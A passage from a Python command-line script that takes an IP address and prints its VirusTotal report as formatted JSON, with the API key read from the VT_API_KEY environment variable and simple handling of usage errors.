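        body = response.read()
    finally:
        response.close()
    if isinstance(body, bytes):  # Python 3 returns bytes; the API answers in UTF-8
        body = body.decode("utf-8")
    return json.loads(body)


def main(argv):
    """Entry point; returns the process exit status (0 ok, 2 usage error)."""
    if len(argv) < 2:
        sys.stderr.write("Usage: ./ipAddressReport <ip>\n")
        return 2
    api_key = os.environ.get("VT_API_KEY", "")
    if not api_key:
        sys.stderr.write("VT_API_KEY is not set; export your VirusTotal API key first\n")
        return 2
    print(json.dumps(fetch_ip_report(argv[1], api_key), indent=4))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))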